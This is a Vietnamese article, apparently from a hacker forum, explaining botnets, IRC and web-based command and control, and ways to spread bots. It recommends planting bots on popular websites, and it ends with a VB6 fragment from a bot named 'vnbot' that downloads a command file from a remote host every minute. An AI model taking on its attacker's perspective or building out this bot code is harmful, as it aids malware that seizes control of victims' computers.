Nội dung bài viết:
Định nghĩa BOTNET
A – Botnet là gì : là những chương trình tương tự Trojan backdoor cho phép kẻ tấn công sử dụng máy của họ như là những Zoombie ( máy tính thây ma – máy tính bị chiếm quyền điều khiển hoàn toàn ) v à chúng chủ động kết nối với một Server để dễ dàng điều khiển , các bạn lưu ý chữ “chủ động” đó là một đặc điểm khác của bot so với trojan backdoor . Chính vì sự chủ động này mà máy tính bị cài đặt chúng kết nối trở nên chậm chạp , một đặc điểm giúp ta dễ dàng nhận diện bot .
B – tại sao gọi là mạng botnet : mạng botnet là một mạng rất lớn gồm hàng trăm hàng ngàn máy tính Zombie kết nối với một máy chủ mIRC ( Internet Replay Chat )
hoặc qua các máy chủ DNS để nhận lệnh từ hacker một cách nhanh nhất . Các mạng bot gồm hàng ngàn “thành viên” là một công cụ lý tưởng cho các cuộc chiến tranh đọ máu như DDOS , spam, cài đặt các chương trình quảng cáo …..
C – mIRC hay DNS :
– mIRC là một hình thức chat có trước yahoo meseger trước đây thường được các botmaster sử dụng riêng tôi thì tôi thích sử dụng các bot chạy trên nền web hơn (
DNS – Domain Name Server ) – vì ngay cả khi ta online hay offline thì chúng vẫn hoạt động
– dễ dàng điều khiển phù hợp với điều kiện VN .
– Note :
trước đây do bot luôn có khả năng lây lan nên còn được gọi là BOTNET – WORM nhưng hiện nay chức năng này được gỡ bỏ vì hai lý do sau
+ Bot dễ bị lộ : Trong khi mục tiêu của botmaster là phục kích lâu dài
+ Kích thước của worm lớn dễ bị Fire Wall chặn dễ phát hiện khó lây lan , =>bot thường được tải xuống bởi 1 chú worm hoặc nguỵ trang bằng một trojan tuỳ theo trình độ , tư duy của botmaster .
=> Theo tôi worm và botnet nên tách rời nhau ra
Phát tán bot như thế nào?
Các botmaster thường phát tán bot theo những cách như sau
1-Sử dụng một con worm tải bot xuống và kích hoạt chúng (ta đã biết là worm lây lan rất mạnh )
2- Gắn bot vào một trojan nói theo cách dễ hiểu nhất là gửi các chương trình bị lây nhiễm bởi bot cho các nạn nhân và tự họ sẽ kích hoạt chúng
3 – Gắn nó lên một trang web nhiều người truy câpj ( thường là các trang web sex :X vì số lượng người tham gia rất lớn )
4- Kết hợp các 1 với 2 hoặc 4 (gắn worm vào trojan hoặc web)
Chú ý : cách lây lan thứ 3 là hay nhất ( tuy có gian hung một chút )vì với cách thứ nhất là dung worm thì rất dễ bị lộ cách thứ 3 thì ko được nhiều , cách thứ 4 thì tạm được
Phân loại bot
– Theo cách điều khiển botnet được chia làm hai loại
+ DNS Bot : điều khiển qua nền web, nguyên tắc hoạt động như sau : đầu tiên tại host điều khiển botmaster sẽ tại một tệp lệnh.txt sau đó bot sẽ download tệp này, tiến hành phân tích và thực hiện yêu cấu của người viết.
-Ưu đỉêm : Thực hiện dễ dàng viết và điều khỉên đơn giản chỉ cần một host bất kỳ là có thể điều khiển được , bot thực hiện lệnh được công việc ngay cả khi chủ bot online hay offline .
-Nhược đỉêm : tốc độ xử lý chậm (do phải mất công cho cả download và upload ) – không có sự trao đổi qua lại giữa chủ bot và zombie .
+ mIRC : điều khiển qua các mạng chat mIRC : ta đã biết là tại hình thức chat Internet Replay Chat, một chương trình có thể tuỳ ý đăng ký và sử dụng một nick name mà không cần phải đăng ký , lợi dụng lỗ hổng này bot mIRC sử dụng chúng để hoạt đông .Nguyên tắc như sau : bot sẽ sử dụng winsock gửi các tệp lệnh IRC để nhận lệnh từ hacker qua một port đã định sẵn khi cấu hình bot cần lưu ý đến Chanel ( gọi tắt là Chan), Port (mặc đinh là 6667), máy chủ Mirc ( thường mở đầu bằng irc.)
– Các bạn có thể tham khảo vấn đề này kỹ hơn tại
www.ryan1918.com
trang web hang đầu về botnet .
Mổ xẻ một bot
Trong bài này vì kiến thức có hạn tôi sẽ chỉ phân tích 1 bot chạy trên nền web có tên là vnbot được viết bằng ngôn ngữ visual basic 6.0 để các bạn hiểu them
đầu tiên là phân tích hàm API sau
Khai báo :
Private Declare Function URLDownloadToFile Lib “urlmon” _
Alias “URLDownloadToFileA” ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Đây là một hàm API sử dụng thư viện hàm của windows
Xử dụng
‘tạ tạo một timer với tên mặc định là timer1 và thuộc tính interval là 60000 (tương đương ‘1 phút )
‘trong sự kiện timer nhập đoạn mã sau vào
Timer1_Timer ()
Call URLDownloadToFile(0&, “http://ww.hótban.com/host.txt”, “C:\test.txt”, &H10, 0&)
‘hàm này có tác dụng là download tệp lệnh về đoạn mã sau có tác dụng đọc chương trình ‘cần chạy
open “c:\test.txt” for input as #1 ‘ Mo theo che do chi doc – Tai cong là #1
line input #1, id ‘ Doc dong dau tien
msgbox id ‘ hien thi ket qua
close #1
‘đóng lại
End sub
‘Ket thuc
2 đoạn mã này có tác dụng đọc và hiển thị kết quả chúng ta mong muốn thông qua net .
Nguồn: http://www.hvaonline.net/